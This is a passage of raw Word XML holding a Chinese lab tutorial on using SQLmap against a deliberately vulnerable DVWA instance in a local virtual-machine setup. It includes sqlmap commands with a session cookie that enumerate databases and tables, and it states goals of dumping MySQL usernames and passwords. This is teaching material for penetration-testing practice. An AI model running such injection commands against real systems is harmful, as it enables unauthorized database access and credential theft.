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E558C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什么是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884CA61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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>非常</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7954C201" w14:textId="4712BC8C" w:rsid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读者可以通过位于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SourceForge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的官方网站下载</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>源码：</w:t>
      </w:r>
      <w:r w:rsidRPr="007B36E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7B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://sourceforge.net/projects/sqlmap/" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007B36E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7B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://sourceforge.net/projects/sqlmap/</w:t>
      </w:r>
      <w:r w:rsidRPr="007B36E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4D82BCA" w14:textId="6414B18F" w:rsid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0BCBF1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如何使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079BB3D9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为方便演示，我们创建两个虚拟机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F3065" w14:textId="4993ED81" w:rsidR="007B36E7" w:rsidRPr="007B36E7" w:rsidRDefault="007B36E7" w:rsidP="007B36E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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受害者机器， windows</w:t>
      </w:r>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>操作系统，运行一个web服务器，同时跑着一个包含漏洞的web应用（DVWA）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25806448" w14:textId="63CCA5F1" w:rsidR="007B36E7" w:rsidRDefault="007B36E7" w:rsidP="007B36E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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519CD1" wp14:editId="01F9B620">
            <wp:extent cx="3876675" cy="3181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F0DC" w14:textId="188B7371" w:rsidR="007B36E7" w:rsidRPr="007B36E7" w:rsidRDefault="007B36E7" w:rsidP="007B36E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="3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B36E7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38D87883" wp14:editId="7BDB1045">
            <wp:extent cx="5274310" cy="18186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851C" w14:textId="5300972D" w:rsidR="007B36E7" w:rsidRPr="007B36E7" w:rsidRDefault="007B36E7" w:rsidP="007B36E7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2、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机器，使用Ubuntu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kali2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC983D" w14:textId="005EE616" w:rsid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B36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9707AF" wp14:editId="22A0BD36">
            <wp:extent cx="6290287" cy="3930555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="C:\Users\dell\Desktop\Debian 8.x 64 位-2018-09-08-22-2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ebian 8.x 64 位-2018-09-08-22-20-1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563" cy="396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8EC4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</w:pPr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本次实验的目的：使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B36E7"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  <w:t>得到以下信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DBB425" w14:textId="77777777" w:rsidR="007B36E7" w:rsidRPr="007B36E7" w:rsidRDefault="007B36E7" w:rsidP="007B36E7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3、枚举MYSQL用户名与密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9AD019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4、枚举所有数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E350F" w14:textId="77777777" w:rsidR="007B36E7" w:rsidRP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5、枚举指定数据库的数据表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B66274" w14:textId="77777777" w:rsidR="007B36E7" w:rsidRPr="007B36E7" w:rsidRDefault="007B36E7" w:rsidP="007B36E7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36E7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6、枚举指定数据表中的所有用户名与密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73881822" w14:textId="24F2D725" w:rsidR="007B36E7" w:rsidRDefault="007B36E7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345C3E" w14:textId="77777777" w:rsidR="00C21449" w:rsidRPr="007B36E7" w:rsidRDefault="00C21449" w:rsidP="007B36E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98D91F7" w14:textId="7185CF0B" w:rsidR="00702F0D" w:rsidRDefault="00C21449">
      <w:r w:rsidRPr="00C21449">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4445B7" wp14:editId="5763A662">
            <wp:extent cx="5274310" cy="1641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BDDA" w14:textId="77777777" w:rsidR="004802F9" w:rsidRDefault="004802F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669958FD" w14:textId="0B3621F2" w:rsidR="00C21449" w:rsidRDefault="00C21449" w:rsidP="004802F9">
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="1"/>
          <w:w w:val="98"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:fitText w:val="9555" w:id="1766179072"/>
        </w:rPr>
        <w:t>首先我们要检测我们的漏洞平台是否有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="1"/>
          <w:w w:val="98"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:fitText w:val="9555" w:id="1766179072"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="1"/>
          <w:w w:val="98"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:fitText w:val="9555" w:id="1766179072"/>
        </w:rPr>
        <w:t>注入 ，进行简单的测试发现在用户</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="1"/>
          <w:w w:val="98"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:fitText w:val="9555" w:id="1766179072"/>
        </w:rPr>
        <w:t>userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="1"/>
          <w:w w:val="98"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:fitText w:val="9555" w:id="1766179072"/>
        </w:rPr>
        <w:t xml:space="preserve"> 上存在注入的漏</w:t>
      </w:r>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-11"/>
          <w:w w:val="98"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:fitText w:val="9555" w:id="1766179072"/>
        </w:rPr>
        <w:t>洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090650C9" wp14:editId="4B4A5670">
            <wp:extent cx="5274310" cy="4683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84987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0879" w14:textId="4CE94F68" w:rsidR="00C21449" w:rsidRDefault="00C21449"/>
    <w:p w14:paraId="2D981D01" w14:textId="3F9D6922" w:rsidR="00C21449" w:rsidRDefault="00C21449"/>
    <w:p w14:paraId="14D718EB" w14:textId="1AE3A180" w:rsidR="00C21449" w:rsidRDefault="00C21449"/>
    <w:p w14:paraId="29B772D5" w14:textId="7DBD2C38" w:rsidR="00C21449" w:rsidRDefault="00C21449"/>
    <w:p w14:paraId="5D564E30" w14:textId="53026C5D" w:rsidR="00C21449" w:rsidRDefault="00C21449"/>
    <w:p w14:paraId="1F041F54" w14:textId="7C32906F" w:rsidR="00C21449" w:rsidRDefault="00C21449"/>
    <w:p w14:paraId="3ADBF7FF" w14:textId="23C5CD47" w:rsidR="00C21449" w:rsidRDefault="00C21449"/>
    <w:p w14:paraId="7660D5E3" w14:textId="77777777" w:rsidR="00C21449" w:rsidRDefault="00C21449">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02092106" w14:textId="5D340F8B" w:rsidR="00C21449" w:rsidRDefault="005445B8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>suite</w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:t>抓</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C21449">
        <w:t>包工具</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C21449">
        <w:t>对其</w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:t>进行获取如下面所示</w:t>
      </w:r>
      <w:r w:rsidR="00C21449">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33AEFA8B" wp14:editId="6D3451E1">
            <wp:extent cx="5274310" cy="1905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8498F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5942" w14:textId="77777777" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对其数据库进行猜解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213423C0" w14:textId="77777777" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D"/>
    <w:p w14:paraId="684C505E" w14:textId="4A5AE02C" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定我们的漏洞地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B41B43" w14:textId="77777777" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D"/>
    <w:p w14:paraId="6286AF81" w14:textId="77777777" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--cookie  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定我们登陆的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6407E3B8" w14:textId="77777777" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D"/>
    <w:p w14:paraId="4CB709ED" w14:textId="1B56D02D" w:rsidR="00C21449" w:rsidRDefault="00A4158D" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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猜解数据库</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C7D202B" w14:textId="1747F8F3" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D"/>
    <w:p w14:paraId="3F264856" w14:textId="7F8E279C" w:rsidR="00A4158D" w:rsidRPr="005445B8" w:rsidRDefault="00A4158D" w:rsidP="00A4158D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
      <w:r w:rsidR="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>"http://192.168.0.103/DVWA-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie "PHPSESSID=95g007aill2ifhaet6e2i9j4g</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>0;security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>=low" –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A8D6215" w14:textId="0B9286DC" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DBDE9E5" wp14:editId="0A38AF55">
            <wp:extent cx="5274310" cy="3765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8419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4AB7" w14:textId="77777777" w:rsidR="005445B8" w:rsidRDefault="005445B8" w:rsidP="00A4158D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A90060" w14:textId="77777777" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D">
      <w:r w:rsidRPr="00A4158D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A4158D"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19F0C6CB" w14:textId="323F5098" w:rsidR="00A4158D" w:rsidRDefault="005445B8" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A4158D" w:rsidRPr="00A4158D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D </w:t>
      </w:r>
      <w:r w:rsidR="00A4158D" w:rsidRPr="00A4158D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定数据库</w:t>
      </w:r>
      <w:r w:rsidR="00A4158D" w:rsidRPr="00A4158D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29425C07" w14:textId="450714B7" w:rsidR="00A4158D" w:rsidRDefault="00A4158D" w:rsidP="00A4158D">
      <w:r w:rsidRPr="00A4158D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--table   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A4158D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来猜解我们</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A4158D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定数据库中有几张表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB28872" w14:textId="73CCC484" w:rsidR="00A4158D" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EBCF10E" wp14:editId="7B4727BF">
            <wp:extent cx="5274310" cy="236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84FEC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FF28" w14:textId="6DBBCA02" w:rsidR="004802F9" w:rsidRPr="005445B8" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://192.168.0.103/DVWA-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie "PHPSESSID=95g007aill2ifhaet6e2i9j4g</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>0;security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">=low" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005445B8">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> –tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E451829" w14:textId="0C7B038B" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C282B2" wp14:editId="3BA38D93">
            <wp:extent cx="527431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841D8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BE86" w14:textId="77777777" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着我们对表的字段进行猜解</w:t>
      </w:r>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592D84D" w14:textId="77777777" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T </w:t>
      </w:r>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定表名</w:t>
      </w:r>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66439561" w14:textId="6D80B2F9" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --columns  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜解表中</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有哪些</w:t>
      </w:r>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004802F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5EF2B7" w14:textId="642210D5" w:rsidR="004802F9" w:rsidRDefault="004802F9" w:rsidP="00A4158D">
      <w:r>
        <w:rPr>
